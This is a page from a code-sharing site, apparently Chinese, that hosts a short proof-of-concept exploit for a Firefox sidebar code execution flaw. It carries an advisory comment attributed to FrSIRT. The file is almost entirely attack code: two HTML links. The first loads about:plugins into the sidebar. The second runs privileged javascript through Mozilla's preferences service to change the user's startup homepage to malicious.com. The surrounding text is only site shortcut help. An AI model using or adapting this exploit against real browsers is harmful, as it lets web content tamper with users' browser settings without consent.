mozilla firefox sidebar code execution proof of concept exploit.txt
来自「一些可以实现益出的程序」· 文本 代码 · 共 9 行
TXT
9 行
// FrSIRT Comment : If a user clicks on a link, this code will load "about:plugins"
// into Firefox sidebar panel and will overwrite "browser.startup.homepage",
// which will change the homepage to malicious.com
<a href="about:plugins" target="_search">Click Here First</a><br>
<a href="javascript: var prefs = Components.classes['@mozilla.org/preferences-service;1']
.getService(Components.interfaces.nsIPrefBranch); prefs.setCharPref('browser.startup.homepage',
'http://www.malicious.com/');" target="_search">Next, Click Here</a></p>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?